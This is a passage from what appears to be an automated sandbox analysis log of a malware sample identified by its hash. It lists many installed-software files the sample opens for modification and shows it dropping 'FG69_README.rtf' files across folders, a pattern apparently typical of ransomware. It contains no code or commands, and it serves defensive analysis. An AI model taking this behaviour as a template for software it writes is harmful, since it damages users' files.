C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Omsk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\uarrow.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server-15.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.war d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Data1.cab d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.smil_1.0.0.v200806040011.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kosrae d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.ui_1.1.200.v20130626-2037.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\New_York d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Bougainville d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\drive.crx d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-2 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\indxicon.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Brunei d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\sound.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-11 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chuuk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Damascus d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UTC d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.bat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\conticon.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\epl-v10.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-heapwalker.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Mawson d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\psfontj2d.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmap.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterBold.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Berlin d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javaws.policy d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives_1.1.100.v20140523-0116.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fil.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.common_3.6.200.v20130402-1505.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CET d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cambridge_Bay d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yakutsk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\README-JDK.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\zipfs.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Baghdad d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\UninstallEnable.ogg d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-1 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pitcairn d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+6 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Panama d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.css.sac_1.3.1.v200903091627.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\view.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\default.jfc d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kwajalein d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Midway d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Memo.jtp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Colombo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\security\US_export_policy.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\fonts\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boise d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Lindeman d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sa.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guam d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Halifax d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Creston d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Detroit d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_streams.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins_1.1.200.v20131119-0908.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-ui.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mexico_City d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Asuncion d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santa_Isabel d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Seyes.jtp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-8 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfxrt.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Regina d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Seoul d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qyzylorda d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Casablanca d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\release d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Class.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\plugins.dat d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt_0.12.1.v20140903-1023.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Uzhgorod d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jmx.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chihuahua d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Helsinki d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sk.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Prague d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+12 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\PST8PDT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Catamarca d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program 